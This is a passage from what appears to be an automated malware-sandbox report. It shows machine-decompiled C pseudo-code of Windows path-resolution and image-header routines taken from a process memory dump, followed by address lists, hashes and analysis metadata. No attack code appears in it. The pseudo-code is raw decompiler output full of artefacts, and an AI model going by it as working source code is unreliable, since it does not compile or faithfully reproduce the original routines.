				signed int _t396;
				signed short* _t398;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t408;
				signed int _t410;
				void* _t411;
				signed int _t412;
				intOrPtr _t413;
				signed short _t418;
				void* _t420;
				signed short _t421;
				signed short _t422;
				short* _t423;
				intOrPtr _t424;
				void* _t425;
				void* _t426;
				signed int _t427;
				signed int _t429;

				_t429 = (_t427 & 0xfffffff8) - 0x2fc;
				_v8 =  *0x443b370 ^ _t429;
				_t340 = _a8;
				_t389 = _a32;
				_t332 = _a24;
				_v756 = _a16;
				_v728 = _a20;
				_t223 = _a28;
				_v736 = _a36;
				_v744 = _t340;
				_v748 = _t332;
				_v716 = _t223;
				_v720 = _t389;
				_v740 = 0;
				_v732 = 0;
				_v764 = 0x2080000;
				_v760 =  &_v532;
				_t410 = _a12;
				_v712 = _t410;
				if(_t223 != 0) {
					 *_t223 = 0;
				}
				_t418 = _v756;
				if(_v736 != 0) {
					 *_v736 = 0;
					_t418 = _v756;
				}
				if(_t389 != 0) {
					 *_t389 = 0;
				}
				if(_t332 != 0) {
					_t389 = 0;
					 *_t332 = 0;
					 *((intOrPtr*)(_t332 + 4)) = 0;
				}
				if((_a4 & 0xfffffff8) != 0 || _t340 == 0 || _t410 == 0 || _v728 != 0 && _t332 != 0 && _t223 == 0) {
					_t224 = 0xc000000d;
					goto L48;
				} else {
					_t343 =  *_t410 & 0x0000ffff;
					_t226 =  *(_t410 + 4);
					if(_t343 < 2) {
						L15:
						if(_t343 < 4 ||  *_t226 == 0 || _t226[1] != 0x3a) {
							_t389 = 5;
						} else {
							if(_t343 < 6) {
								L127:
								_t389 = 3;
								L21:
								_v724 = _t389;
								if((_a4 & 0x00000002) == 0) {
									__eflags = _t389 - 5;
									if(_t389 == 5) {
										L53:
										__eflags = _a4 & 0x00000001;
										if((_a4 & 0x00000001) != 0) {
											_v696 = 0;
											_t421 = E04359870(1, _t410, _t418, _v728, _t332,  &_v696, 0, _v720, _v736);
											__eflags = _t421;
											if(_t421 >= 0) {
												_t344 = _v716;
												__eflags = _t344;
												if(_t344 != 0) {
													 *_t344 = _v696;
												}
												L50:
												_t421 = 0;
												L45:
												_t229 = _v760;
												if(_t229 != 0 && _t229 !=  &_v532) {
													E04353B90( &_v764);
												}
												_t224 = _t421;
												L48:
												_pop(_t411);
												_pop(_t420);
												_pop(_t333);
												return E04384B50(_t224, _t333, _v8 ^ _t429, _t389, _t411, _t420);
											}
											__eflags = _t421 - 0xc0150008;
											if(_t421 != 0xc0150008) {
												goto L45;
											}
											_t418 = _v756;
										}
										__eflags = _t418;
										if(_t418 == 0) {
											L64:
											_t346 = _v744;
											_t233 =  *_t346 & 0x0000ffff;
											_t422 = _t233;
											_v704 = _t422;
											__eflags = _t233;
											if(_t233 == 0) {
												L77:
												_t389 = _v732 & 0x0000ffff;
												_v752 = _t389;
												_t237 = ( *_t410 & 0x0000ffff) + _t389 + _v740 + 2;
												_t336 = _v748;
												_v704 = _t237;
												__eflags = _t237 - 0xfffe;
												if(_t237 > 0xfffe) {
													_t421 = 0xc0000106;
													goto L45;
												}
												_t347 =  *((intOrPtr*)(_t346 + 4));
												_v748 = _t347;
												_t240 = _t347 + ((_t422 & 0x0000ffff) >> 1) * 2;
												_v712 = _t240;
												__eflags = _t347 - _t240;
												if(_t347 >= _t240) {
													L44:
													_t421 = 0xc000000f;
													goto L45;
												} else {
													goto L79;
												}
												while(1) {
													L79:
													_t423 = _t347;
													__eflags = _t347 - _t240;
													if(_t347 == _t240) {
														goto L82;
													} else {
														goto L80;
													}
													while(1) {
														L80:
														__eflags =  *_t423 - 0x3b;
														if( *_t423 == 0x3b) {
															goto L82;
														}
														_t423 = _t423 + 2;
														__eflags = _t423 - _t240;
														if(_t423 != _t240) {
															continue;
														}
														goto L82;
													}
													L82:
													_t244 = _t423 - _t347 & 0xfffe;
													_v744 = _t244;
													_v732 = _t244 & 0x0000ffff;
													__eflags = _t244;
													if(_t244 != 0) {
														_t360 =  *(_t423 - 2) & 0x0000ffff;
														__eflags = _t360 - 0x5c;
														if(_t360 != 0x5c) {
															__eflags = _t360 - 0x2f;
															if(_t360 != 0x2f) {
																_t244 = _t244 + 2;
																__eflags = _t244;
																_v744 = _t244;
															}
														}
													}
													_t389 = _t389 + ( *_t410 & 0x0000ffff) + (_t244 & 0x0000ffff);
													_t133 = _t389 + 2; // 0x4
													__eflags = ( *(_t429 + 0x12) & 0x0000ffff) - _t133;
													if(( *(_t429 + 0x12) & 0x0000ffff) < _t133) {
														__eflags = _v760 -  &_v532;
														if(_v760 !=  &_v532) {
															goto L163;
														}
														__eflags = _t389 - 0xfffc;
														if(_t389 > 0xfffc) {
															goto L163;
														}
														 *((short*)(_t429 + 0x16)) = _v704 & 0x0000ffff;
														_t250 = E04355D60(_v704 & 0x0000ffff);
														_v764 = _t250;
														__eflags = _t250;
														if(_t250 == 0) {
															L149:
															_t224 = 0xc0000017;
															goto L48;
														}
														goto L87;
													} else {
														L87:
														_v764 = 0;
														E0436DCDF( &_v764, _v748, _v732 & 0x0000ffff);
														_t255 = _v748;
														__eflags = _t255;
														if(_t255 != 0) {
															__eflags = _v732 - _t255;
															if(_v732 != _t255) {
																 *((short*)(_v760 + ((_v764 & 0x0000ffff) >> 1) * 2)) = 0x5c;
																_t144 =  &_v764;
																 *_t144 = _v764 + 2;
																__eflags =  *_t144;
															}
														}
														E0436DD46( &_v764, _t410);
														_t257 = _v756;
														__eflags = _t257;
														if(_t257 != 0) {
															E0436DD46( &_v764, _t257);
														}
														_t389 = _v764 & 0x0000ffff;
														_t150 = _t389 + 2; // 0x4
														__eflags = _t150 - ( *(_t429 + 0x12) & 0x0000ffff);
														if(__eflags > 0) {
															L163:
															_t421 = 0xc00000e5;
															goto L45;
														} else {
															 *((short*)(_v760 + (_t389 >> 1) * 2)) = 0;
															_t389 = 0;
															_t261 = E043731BE( &_v764, 0, __eflags);
															__eflags = _t261;
															if(_t261 != 0) {
																_push(_v736);
																_push( &_v724);
																_push(0);
																_push(_v720);
																_push(_v716);
																_push(_t336);
																L106:
																_push(_v728);
																_push( &_v764);
																_t421 = E04359690();
																__eflags = _t421;
																if(_t421 >= 0) {
																	_t421 = 0;
																}
																goto L45;
															}
															_t240 = _v712;
															__eflags = _t423 - _t240;
															if(_t423 == _t240) {
																_t347 = _t423;
																_v748 = _t423;
															} else {
																_t156 = _t423 + 2; // 0x3a
																_t347 = _t156;
																_v748 = _t347;
															}
															__eflags = _t347 - _t240;
															if(_t347 >= _t240) {
																goto L44;
															} else {
																_t389 = _v752;
																continue;
															}
														}
													}
												}
											}
											_t424 =  *((intOrPtr*)(_t346 + 4));
											_t361 = _t424 + (_t233 >> 1) * 2;
											_t396 = _t361;
											__eflags = _t396 - _t424;
											if(_t396 <= _t424) {
												L70:
												_t270 = _t361 - _t396 >> 0x00000001 & 0x0000ffff;
												__eflags = _t270;
												if(_t270 != 0) {
													_t362 =  *(_t361 - 2) & 0x0000ffff;
													__eflags = _t362 - 0x5c;
													if(_t362 != 0x5c) {
														__eflags = _t362 - 0x2f;
														if(_t362 != 0x2f) {
															_t270 = _t270 + 1;
															__eflags = _t270;
														}
													}
												}
												_t271 = _t270 & 0x0000ffff;
												__eflags = _t271 - _v740;
												if(_t271 <= _v740) {
													_t271 = _v740;
												}
												_t346 = _v744;
												_t272 = _t271 + _t271;
												__eflags = _t272;
												_t422 = _v704;
												_v740 = _t272;
												goto L77;
											} else {
												_t273 = _t396 - 2;
												_t412 = _t361;
												goto L67;
												L67:
												__eflags =  *_t273 - 0x3b;
												if( *_t273 == 0x3b) {
													_t367 = _t412 - _t396 + 0x00000002 >> 0x00000001 & 0x0000ffff;
													_v752 = _t367;
													_t369 = _t367 - 0x00000001 & 0x0000ffff;
													__eflags = _t369;
													if(_t369 != 0) {
														_t337 =  *(_t412 - 2) & 0x0000ffff;
														__eflags = _t337 - 0x5c;
														if(_t337 != 0x5c) {
															__eflags = _t337 - 0x2f;
															if(_t337 != 0x2f) {
																_t369 = _v752 & 0x0000ffff;
															}
														}
													}
													_t370 = _t369 & 0x0000ffff;
													__eflags = _t370 - _v740;
													if(_t370 > _v740) {
														_v740 = _t370;
													}
													_t412 = _t273;
												}
												_t396 = _t396 - 2;
												_t273 = _t273 - 2;
												__eflags = _t396 - _t424;
												if(_t396 > _t424) {
													goto L67;
												} else {
													_v752 = _t412;
													_t410 = _v712;
													_t361 = _v752;
													goto L70;
												}
											}
										}
										_t274 =  *_t410 & 0x0000ffff;
										_v732 =  *_t418 & 0x0000ffff;
										__eflags = _t274;
										if(_t274 == 0) {
											goto L64;
										}
										_t398 =  *(_t410 + 4);
										_t276 =  &(_t398[_t274 >> 1]);
										__eflags = _t276 - _t398;
										if(_t276 > _t398) {
											while(1) {
												_t372 =  *(_t276 - 2) & 0x0000ffff;
												_t276 = _t276 - 2;
												__eflags = _t372 - 0x2e;
												if(_t372 == 0x2e) {
													_v756 = 0;
													_v732 = 0;
													goto L64;
												}
												__eflags = _t372 - 0x5c;
												if(_t372 == 0x5c) {
													goto L64;
												}
												__eflags = _t372 - 0x2f;
												if(_t372 == 0x2f) {
													goto L64;
												}
												__eflags = _t276 - _t398;
												if(_t276 > _t398) {
													continue;
												} else {
													goto L64;
												}
											}
										}
										goto L64;
									}
									L23:
									_t389 = _t410;
									if(L043558B0(2, _t410, 0,  &_v704, 0, 0,  &_v692) < 0) {
										L31:
										if(_t418 == 0) {
											goto L44;
										}
										_t280 =  *_t418 & 0x0000ffff;
										if(_t280 == 0) {
											goto L44;
										}
										_t389 = _t280;
										if((_a4 & 0x00000004) == 0) {
											_t281 =  *_t410 & 0x0000ffff;
											__eflags = _t281;
											if(_t281 == 0) {
												goto L34;
											}
											_t339 =  *(_t410 + 4);
											_t313 =  &(_t339[_t281 >> 1]);
											__eflags = _t313 - _t339;
											if(_t313 <= _t339) {
												goto L34;
											} else {
												goto L142;
											}
											while(1) {
												L142:
												_t386 =  *(_t313 - 2) & 0x0000ffff;
												_t313 = _t313 - 2;
												__eflags = _t386 - 0x5c;
												if(_t386 == 0x5c) {
													goto L34;
												}
												__eflags = _t386 - 0x2f;
												if(_t386 == 0x2f) {
													goto L34;
												}
												__eflags = _t386 - 0x2e;
												if(_t386 == 0x2e) {
													goto L44;
												}
												__eflags = _t313 - _t339;
												if(_t313 > _t339) {
													continue;
												}
												goto L34;
											}
										}
										L34:
										_t376 = ( *_t410 & 0x0000ffff) + 2 + _t389;
										if(_t376 > 0xfffe) {
											_t421 = 0xc0000106;
											goto L45;
										}
										if(_t376 > ( *(_t429 + 0x12) & 0x0000ffff)) {
											 *((short*)(_t429 + 0x16)) = _t376 & 0x0000ffff;
											_t377 = E04355D60(_t376 & 0x0000ffff);
											_v764 = _t377;
											__eflags = _t377;
											if(_t377 != 0) {
												goto L37;
											}
											goto L149;
										} else {
											_t377 = _v760;
											L37:
											E043888C0(_t377,  *(_t410 + 4),  *_t410 & 0x0000ffff);
											E043888C0(_v760 + (( *_t410 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t418 + 4)),  *_t418 & 0x0000ffff);
											_t429 = _t429 + 0x18;
											 *((short*)(_v760 + (( *_t418 & 0x0000ffff) + ( *_t410 & 0x0000ffff) >> 1) * 2)) = 0;
											_v764 =  *_t418 +  *_t410;
											_t389 =  &_v764;
											if(L043558B0(2,  &_v764, 0,  &_v712, 0, 0,  &_v676) < 0) {
												goto L44;
											}
											_t299 = _v676;
											_t413 = _v708;
											if(_t299 != 0) {
												_v712 = _t299;
												_v708 = _v672;
												_t301 = _v668;
											} else {
												_t301 = 0;
											}
											_v632 = _t301;
											 *((intOrPtr*)(_t429 + 0x98)) =  &_v712;
											_push(_t429 + 0xd0);
											 *(_t429 + 0x94) = 0x18;
											_push(_t429 + 0x94);
											 *((intOrPtr*)(_t429 + 0xa4)) = 0x40;
											 *(_t429 + 0xa8) = 0;
											_v616 = 0;
											_t305 = E04382D80();
											_t338 = _v672;
											_t425 = _t305;
											if(_t338 != 0) {
												__eflags = 0xffffffffffffffff;
												asm("lock xadd [ebx], ecx");
												if(0xffffffffffffffff == 0) {
													_push( *((intOrPtr*)(_t338 + 4)));
													E04382A80();
													E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t338);
												}
											}
											E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t413);
											if(_t425 >= 0 || _t425 == 0xc0000043 || _t425 == 0xc0000022) {
												_push(_v736);
												_push( &_v724);
												_push(0);
												_push(_v720);
												_push(_v716);
												_push(_v748);
												goto L106;
											} else {
												goto L44;
											}
										}
									}
									_v744 = _v700;
									_t315 = _v692;
									if(_t315 != 0) {
										_v704 = _t315;
										_v700 =  *(_t429 + 0x5c);
										_t317 =  *((intOrPtr*)(_t429 + 0x60));
									} else {
										_t317 = 0;
									}
									 *((intOrPtr*)(_t429 + 0x7c)) = _t317;
									 *((intOrPtr*)(_t429 + 0x80)) =  &_v704;
									_push(_t429 + 0xa8);
									_v660 = 0x18;
									_push( &_v660);
									 *((intOrPtr*)(_t429 + 0x8c)) = 0x40;
									 *(_t429 + 0x90) = 0;
									 *(_t429 + 0x94) = 0;
									_t426 = E04382D80();
									_t322 =  *((intOrPtr*)(_t429 + 0x64));
									if(_t322 != 0) {
										__eflags = 0xffffffffffffffff;
										asm("lock xadd [eax], ecx");
										if(0xffffffffffffffff == 0) {
											_push( *((intOrPtr*)(_t322 + 4)));
											E04382A80();
											E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t429 + 0x64)));
										}
									}
									E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v744);
									if(_t426 >= 0 || _t426 == 0xc0000043 || _t426 == 0xc0000022) {
										_t421 = E04359690(_t410, _v728, _t332, _v716, _v720, 0,  &_v724, _v736);
										__eflags = _t421;
										if(_t421 < 0) {
											goto L45;
										}
										goto L50;
									} else {
										_t418 = _v756;
										goto L31;
									}
								}
								if(_t389 == 5) {
									__eflags = _t343 - 4;
									if(_t343 < 4) {
										goto L53;
									}
									__eflags =  *_t226 - 0x2e;
									if( *_t226 == 0x2e) {
										_t389 = _t226[1] & 0x0000ffff;
										__eflags = _t389 - 0x5c;
										if(_t389 == 0x5c) {
											L134:
											_v724 = 0;
											goto L23;
										}
										__eflags = _t389 - 0x2f;
										if(_t389 == 0x2f) {
											goto L134;
										}
										__eflags = _t389 - 0x2e;
										if(_t389 != 0x2e) {
											goto L53;
										}
										__eflags = _t343 - 6;
										if(_t343 < 6) {
											goto L53;
										}
										_t330 = _t226[2] & 0x0000ffff;
										__eflags = _t330 - 0x5c;
										if(_t330 == 0x5c) {
											goto L134;
										}
										__eflags = _t330 - 0x2f;
										if(_t330 != 0x2f) {
											goto L53;
										}
										goto L134;
									}
									goto L53;
								}
								goto L23;
							}
							_t400 = _t226[2] & 0x0000ffff;
							if(_t400 != 0x5c) {
								__eflags = _t400 - 0x2f;
								if(_t400 == 0x2f) {
									goto L20;
								}
								goto L127;
							}
							L20:
							_t389 = 2;
						}
						goto L21;
					}
					_t401 =  *_t226 & 0x0000ffff;
					if(_t401 == 0x5c || _t401 == 0x2f) {
						__eflags = _t343 - 4;
						if(_t343 < 4) {
							L125:
							_t389 = 4;
							goto L21;
						}
						_t402 = _t226[1] & 0x0000ffff;
						__eflags = _t402 - 0x5c;
						if(_t402 == 0x5c) {
							L116:
							__eflags = _t343 - 6;
							if(_t343 < 6) {
								L124:
								_t389 = 1;
								goto L21;
							}
							_t403 = _t226[2] & 0x0000ffff;
							__eflags = _t403 - 0x2e;
							if(_t403 == 0x2e) {
								L119:
								__eflags = _t343 - 8;
								if(_t343 < 8) {
									L123:
									__eflags = _t343 - 6;
									_t389 = ((0 | _t343 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
									goto L21;
								}
								_t408 = _t226[3] & 0x0000ffff;
								__eflags = _t408 - 0x5c;
								if(_t408 == 0x5c) {
									L122:
									_t389 = 6;
									goto L21;
								}
								__eflags = _t408 - 0x2f;
								if(_t408 != 0x2f) {
									goto L123;
								}
								goto L122;
							}
							__eflags = _t403 - 0x3f;
							if(_t403 != 0x3f) {
								goto L124;
							}
							goto L119;
						}
						__eflags = _t402 - 0x2f;
						if(_t402 != 0x2f) {
							goto L125;
						}
						goto L116;
					} else {
						goto L15;
					}
				}
			}

0x043551c8
0x043551d5
0x043551e2
0x043551e5
0x043551e8
0x043551ee
0x043551f5
0x043551f9
0x043551fc
0x04355207
0x0435520b
0x0435520f
0x04355213
0x04355217
0x0435521f
0x04355227
0x0435522f
0x04355233
0x04355236
0x0435523c
0x0435523e
0x0435523e
0x04355249
0x0435524d
0x04355843
0x04355849
0x04355849
0x04355255
0x04355852
0x04355852
0x0435525d
0x0435525f
0x04355261
0x04355263
0x04355263
0x0435526d
0x043a6c97
0x00000000
0x04355296
0x04355296
0x04355299
0x0435529f
0x043552b6
0x043552b9
0x04355801
0x043552d4
0x043552d7
0x043a6a9c
0x043a6a9c
0x043552ef
0x043552f3
0x043552f7
0x043a6ae5
0x043a6ae8
0x04355595
0x04355595
0x04355599
0x04355865
0x04355882
0x04355884
0x04355886
0x043a6c0a
0x043a6c0e
0x043a6c10
0x043a6c1a
0x043a6c1a
0x04355582
0x04355582
0x0435552d
0x0435552d
0x04355533
0x043a6c8d
0x043a6c8d
0x04355544
0x04355546
0x0435554d
0x0435554e
0x0435554f
0x0435555a
0x0435555a
0x0435588c
0x04355892
0x00000000
0x00000000
0x04355898
0x04355898
0x0435559f
0x043555a1
0x043555ec
0x043555ec
0x043555f0
0x043555f3
0x043555f5
0x043555f9
0x043555fc
0x04355669
0x04355671
0x0435567c
0x04355680
0x04355682
0x04355686
0x0435568a
0x0435568f
0x043a6c21
0x00000000
0x043a6c21
0x04355695
0x0435569d
0x043556a1
0x043556a4
0x043556a8
0x043556aa
0x04355528
0x04355528
0x00000000
0x00000000
0x00000000
0x00000000
0x043556b0
0x043556b0
0x043556b0
0x043556b2
0x043556b4
0x00000000
0x00000000
0x00000000
0x00000000
0x043556b6
0x043556b6
0x043556b6
0x043556ba
0x00000000
0x00000000
0x043556bc
0x043556bf
0x043556c1
0x00000000
0x00000000
0x00000000
0x043556c1
0x043556c3
0x043556ca
0x043556d0
0x043556d4
0x043556d8
0x043556db
0x043556dd
0x043556e1
0x043556e4
0x043556e6
0x043556e9
0x043556eb
0x043556eb
0x043556ee
0x043556ee
0x043556e9
0x043556e4
0x043556fa
0x04355701
0x04355704
0x04355706
0x043a6c32
0x043a6c36
0x00000000
0x00000000
0x043a6c38
0x043a6c3e
0x00000000
0x00000000
0x043a6c48
0x043a6c4d
0x043a6c52
0x043a6c56
0x043a6c58
0x043a6ba3
0x043a6ba3
0x00000000
0x043a6ba3
0x00000000
0x0435570c
0x0435570c
0x04355716
0x04355723
0x04355728
0x0435572c
0x0435572f
0x04355731
0x04355736
0x04355748
0x0435574c
0x0435574c
0x0435574c
0x0435574c
0x04355736
0x04355758
0x0435575d
0x04355761
0x04355763
0x043a6c69
0x043a6c69
0x04355769
0x04355773
0x04355776
0x04355778
0x043a6c7e
0x043a6c7e
0x00000000
0x0435577e
0x04355786
0x0435578a
0x04355790
0x04355795
0x04355797
0x0435580b
0x04355817
0x04355818
0x0435581a
0x0435581e
0x0435581f
0x04355820
0x04355820
0x04355828
0x0435582e
0x04355830
0x04355832
0x04355838
0x04355838
0x00000000
0x04355832
0x04355799
0x0435579d
0x0435579f
0x043a6c73
0x043a6c75
0x043557a5
0x043557a5
0x043557a5
0x043557a8
0x043557a8
0x043557ac
0x043557ae
0x00000000
0x043557b4
0x043557b4
0x00000000
0x043557b4
0x043557ae
0x04355778
0x04355706
0x043556b0
0x043555fe
0x04355603
0x04355606
0x04355608
0x0435560a
0x04355631
0x04355637
0x0435563a
0x0435563d
0x0435563f
0x04355643
0x04355646
0x04355648
0x0435564b
0x0435564d
0x0435564d
0x0435564d
0x0435564b
0x04355646
0x0435564e
0x04355651
0x04355655
0x04355657
0x04355657
0x0435565b
0x0435565f
0x0435565f
0x04355661
0x04355665
0x00000000
0x0435560c
0x0435560c
0x0435560f
0x0435560f
0x04355611
0x04355611
0x04355615
0x043557c6
0x043557c9
0x043557ce
0x043557d1
0x043557d4
0x043557d6
0x043557da
0x043557dd
0x043557df
0x043557e2
0x043557e8
0x043557e8
0x043557e2
0x043557dd
0x043557eb
0x043557ee
0x043557f2
0x043557fb
0x043557fb
0x043557f4
0x043557f4
0x0435561b
0x0435561e
0x04355621
0x04355623
0x00000000
0x04355625
0x04355625
0x04355629
0x0435562d
0x00000000
0x0435562d
0x04355623
0x0435560a
0x043555a3
0x043555a9
0x043555ad
0x043555b0
0x00000000
0x00000000
0x043555b2
0x043555b7
0x043555ba
0x043555bc
0x043555c0
0x043555c0
0x043555c4
0x043555c7
0x043555ca
0x043555dc
0x043555e4
0x043555e4
0x043555e4
0x043555cc
0x043555cf
0x00000000
0x00000000
0x043555d1
0x043555d4
0x00000000
0x00000000
0x043555d6
0x043555d8
0x00000000
0x043555da
0x00000000
0x043555da
0x043555d8
0x043555c0
0x00000000
0x043555bc
0x04355306
0x0435530a
0x04355324
0x043553d1
0x043553d3
0x00000000
0x00000000
0x043553d9
0x043553df
0x00000000
0x00000000
0x043553e9
0x043553eb
0x043a6b36
0x043a6b39
0x043a6b3c
0x00000000
0x00000000
0x043a6b42
0x043a6b47
0x043a6b4a
0x043a6b4c
0x00000000
0x00000000
0x00000000
0x00000000
0x043a6b52
0x043a6b52
0x043a6b52
0x043a6b56
0x043a6b59
0x043a6b5c
0x00000000
0x00000000
0x043a6b62
0x043a6b65
0x00000000
0x00000000
0x043a6b6b
0x043a6b6e
0x00000000
0x00000000
0x043a6b74
0x043a6b76
0x00000000
0x00000000
0x00000000
0x043a6b78
0x043a6b52
0x043553f1
0x043553f9
0x04355401
0x043a6b7d
0x00000000
0x043a6b7d
0x0435540e
0x043a6b8b
0x043a6b95
0x043a6b97
0x043a6b9b
0x043a6b9d
0x00000000
0x00000000
0x00000000
0x04355414
0x04355414
0x04355418
0x04355420
0x04355439
0x04355446
0x04355451
0x04355460
0x04355472
0x0435547d
0x00000000
0x00000000
0x04355483
0x04355487
0x0435548e
0x043a6bad
0x043a6bb5
0x043a6bb9
0x04355494
0x04355494
0x04355494
0x04355496
0x043554a1
0x043554af
0x043554b7
0x043554c2
0x043554c3
0x043554ce
0x043554d9
0x043554e4
0x043554e9
0x043554ed
0x043554f1
0x043a6bc2
0x043a6bc5
0x043a6bc9
0x043a6bcf
0x043a6bd2
0x043a6be3
0x043a6be3
0x043a6bc9
0x04355503
0x0435550a
0x043a6bed
0x043a6bf9
0x043a6bfa
0x043a6bfc
0x043a6c00
0x043a6c01
0x00000000
0x00000000
0x00000000
0x00000000
0x0435550a
0x0435540e
0x0435532e
0x04355332
0x04355339
0x043a6af3
0x043a6afb
0x043a6aff
0x0435533f
0x0435533f
0x0435533f
0x04355341
0x04355349
0x04355357
0x0435535c
0x04355364
0x04355365
0x04355370
0x0435537b
0x0435538b
0x0435538d
0x04355393
0x043a6b08
0x043a6b0b
0x043a6b0f
0x043a6b15
0x043a6b18
0x043a6b2c
0x043a6b2c
0x043a6b0f
0x043553a8
0x043553af
0x0435557c
0x0435557e
0x04355580
0x00000000
0x00000000
0x00000000
0x043553cd
0x043553cd
0x00000000
0x043553cd
0x043553af
0x04355300
0x04355586
0x04355589
0x00000000
0x00000000
0x0435558b
0x0435558f
0x043a6aa6
0x043a6aaa
0x043a6aad
0x043a6ad8
0x043a6ad8
0x00000000
0x043a6ad8
0x043a6aaf
0x043a6ab2
0x00000000
0x00000000
0x043a6ab4
0x043a6ab7
0x00000000
0x00000000
0x043a6abd
0x043a6ac0
0x00000000
0x00000000
0x043a6ac6
0x043a6aca
0x043a6acd
0x00000000
0x00000000
0x043a6acf
0x043a6ad2
0x00000000
0x00000000
0x00000000
0x043a6ad2
0x00000000
0x0435558f
0x00000000
0x04355300
0x043552dd
0x043552e4
0x043a6a93
0x043a6a96
0x00000000
0x00000000
0x00000000
0x043a6a96
0x043552ea
0x043552ea
0x043552ea
0x00000000
0x043552b9
0x043552a1
0x043552a7
0x043a6a2a
0x043a6a2d
0x043a6a89
0x043a6a89
0x00000000
0x043a6a89
0x043a6a2f
0x043a6a33
0x043a6a36
0x043a6a3d
0x043a6a3d
0x043a6a40
0x043a6a7f
0x043a6a7f
0x00000000
0x043a6a7f
0x043a6a42
0x043a6a46
0x043a6a49
0x043a6a50
0x043a6a50
0x043a6a53
0x043a6a6d
0x043a6a6f
0x043a6a79
0x00000000
0x043a6a79
0x043a6a55
0x043a6a59
0x043a6a5c
0x043a6a63
0x043a6a63
0x00000000
0x043a6a63
0x043a6a5e
0x043a6a61
0x00000000
0x00000000
0x00000000
0x043a6a61
0x043a6a4b
0x043a6a4e
0x00000000
0x00000000
0x00000000
0x043a6a4e
0x043a6a38
0x043a6a3b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x043552a7

Strings

@, xrefs: 04355365
@, xrefs: 043554C3

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: b25a87c99a70b284a051a2d07a5ebd2d3e3ea5c0831a66fa4c4536a03d004e19
Instruction ID: eb92b01daf6824e5b1151b878c71a47d8fc432b04076751961f54222719416b8
Opcode Fuzzy Hash: b25a87c99a70b284a051a2d07a5ebd2d3e3ea5c0831a66fa4c4536a03d004e19
Instruction Fuzzy Hash: A3329C706083519BD7248F18C480B3EB7E5EF88754F18692EFD968B6A4E734F854CB92

Uniqueness

Uniqueness Score: -1.00%

Function 043C174B Relevance: 2.8, Strings: 2, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E043C174B(void* __ecx) {
				intOrPtr _v12;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				signed int _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v92;
				signed int* _v96;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				char _v112;
				intOrPtr _v120;
				char _v124;
				char _v128;
				intOrPtr _v136;
				char _v140;
				char _v141;
				void* _t108;
				signed int _t109;
				intOrPtr _t115;
				void* _t162;
				intOrPtr* _t164;
				intOrPtr* _t165;
				char _t167;
				void* _t170;
				void* _t171;
				intOrPtr _t174;
				char _t179;
				intOrPtr _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				char _t186;
				void* _t190;
				void* _t192;
				signed int _t194;
				void* _t196;
				signed int _t197;
				signed int _t198;
				void* _t200;
				signed int* _t203;

				_t171 = __ecx;
				_t183 =  *((intOrPtr*)( *[fs:0x30] + 8));
				_t167 = 0;
				_t200 = 0;
				_t194 =  *(__ecx + 6) & 0x0000ffff;
				_t108 = ( *(__ecx + 0x14) & 0x0000ffff) + 0x2c;
				_v141 = 0;
				_v104 = _t183;
				if(_t194 == 0) {
					L7:
					_t109 =  *(_t171 + 0xac);
					if(_t109 == 0) {
						L15:
						_t184 =  *((intOrPtr*)(_t171 + 0x9c));
						if(_t184 != 0) {
							_t162 =  *((intOrPtr*)(_t171 + 0x98)) + _t184;
							if(_t162 > _t200) {
								_t200 = _t162;
							}
						}
						_push(0);
						_push(0x30);
						_push( &_v52);
						_push(0x25);
						_push(0xffffffff);
						if(E04382B20() < 0) {
							L44:
							return _t167;
						} else {
							_t22 = _t200 + 0x2000; // 0x2000
							if(_t22 >= _v12) {
								goto L44;
							}
							_t115 =  *0x4435b24; // 0x2711e28
							_t25 = _t115 + 0x28; // 0x2710fb8
							if(E04361BA0(_t171,  *_t25,  &_v84, 0, 0) == 0) {
								goto L44;
							}
							_v72 = _v72 & 0x00000000;
							_v60 = _v60 & 0x00000000;
							_v56 = _v56 & 0x00000000;
							_push(0x60);
							_v68 =  &_v84;
							_push(5);
							_push( &_v92);
							_v76 = 0x18;
							_push( &_v76);
							_push(0x100001);
							_v64 = 0x40;
							_push( &_v128);
							if(E04382CE0() < 0) {
								L43:
								E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v80);
								goto L44;
							}
							_push(0);
							_v136 = 0;
							_v140 = _v12 + 0xfffffffc;
							_push( &_v140);
							_t196 = 4;
							_push(_t196);
							_push( &_v112);
							_push( &_v92);
							_push(0);
							_push(0);
							_push(0);
							_push(_v128);
							if(E043829F0() < 0) {
								L42:
								_push(_v128);
								E04382A80();
								goto L43;
							}
							_t185 = _v112;
							_t174 = _v12;
							if(_t185 < _t196 || _t185 + 4 > _t174) {
								L32:
								if(_t185 + 0xc > _t174) {
									goto L42;
								}
								_v140 = _t174 - _t185 - 0xc;
								_push(0);
								_push( &_v140);
								_push(8);
								_v136 = 0;
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E043829F0() < 0) {
									goto L42;
								}
								if(_v120 == 0x44646441) {
									goto L38;
								}
								_t179 = _v124;
								_t78 = _t179 + 4; // 0x103
								if(_t78 > _v12) {
									goto L42;
								}
								_v140 = _t179;
								_push(0);
								_push( &_v140);
								_push(_t196);
								_v136 = 0;
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
